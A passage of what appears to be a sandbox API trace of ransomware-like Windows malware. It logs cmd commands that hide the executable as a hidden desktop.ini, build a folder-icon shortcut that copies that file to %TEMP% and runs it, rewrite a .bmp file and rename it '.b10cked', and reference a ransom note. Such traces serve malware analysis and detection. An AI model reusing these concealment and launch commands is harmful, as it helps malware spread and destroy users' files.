\"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0219.939] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0219.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI") returned 0x1d [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0219.939] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0219.939] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6bc, dwThreadId=0x610)) returned 1 [0219.949] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0223.932] CloseHandle (hObject=0x1b4) returned 1 [0223.932] CloseHandle (hObject=0x120) returned 1 [0223.932] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0223.933] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0223.933] GetTickCount () returned 0x3de7c [0223.933] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28072200720) returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0223.933] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"GbkI\" & type \"GbkI\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"GBKI\" & TYPE \"GBKI\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0223.933] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"GbkI\" & type \"GbkI\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"GBKI\" & TYPE \"GBKI\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0223.933] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0223.933] CoInitialize (pvReserved=0x0) returned 0x0 [0223.934] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0223.935] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0223.935] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0223.935] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"GbkI\" & type \"GbkI\\desktop.ini\" > \"%TEMP%\\bnujXP1G.exe\" && \"%TEMP%\\bnujXP1G.exe\"") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0223.938] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0223.938] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI.lnk", fRemember=0) returned 0x0 [0223.949] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0223.949] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0223.949] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0223.949] CoUninitialize () [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\1up3 l.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\1up3 l.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.950] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28073964632) returned 1 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17d0e [0223.952] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x181f6 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x181f6 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.954] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc0fa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc0fa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49402, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0fc [0223.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc0fa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49402, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0fc [0223.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc0fa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1up3 l.bmp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0223.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1up3 l.bmp", cchWideChar=10, lpMultiByteStr=0x131324c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1up3 l.bmp", lpUsedDefaultChar=0x0) returned 10 [0223.959] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x181f6 [0223.959] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.960] CloseHandle (hObject=0x1b4) returned 1 [0223.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\1up3 l.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP") returned 0x32 [0223.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.961] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf50, dwThreadId=0xe28)) returned 1 [0223.975] CloseHandle (hObject=0x120) returned 1 [0223.975] CloseHandle (hObject=0x1b4) returned 1 [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0223.975] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 3 [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0223.975] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0223.975] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0223.975] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0223.975] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0223.975] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.976] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", 